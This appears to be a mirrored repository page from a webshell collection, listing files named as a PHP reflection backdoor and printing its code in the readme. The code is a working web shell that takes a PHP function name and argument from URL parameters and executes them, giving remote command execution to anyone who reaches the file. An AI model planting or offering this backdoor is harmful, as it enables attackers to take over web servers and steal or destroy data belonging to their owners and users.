mirror of
https://github.com/tennc/webshell
synced 2025-02-16 17:58:23 +00:00
.. | ||
11.jpg | ||
PHP reflection.php.txt | ||
PHP反射后门.php.txt | ||
Readme.md |
![Title alt text](/Mirrors/webshell/media/commit/457530e9370ee9531d52bb6d06084bea6744f1cd/php/p2j/11.jpg)
code:
<?php
$func = new ReflectionFunction($_GET[m]);
echo $func->invokeArgs(array($_GET[c]));
?>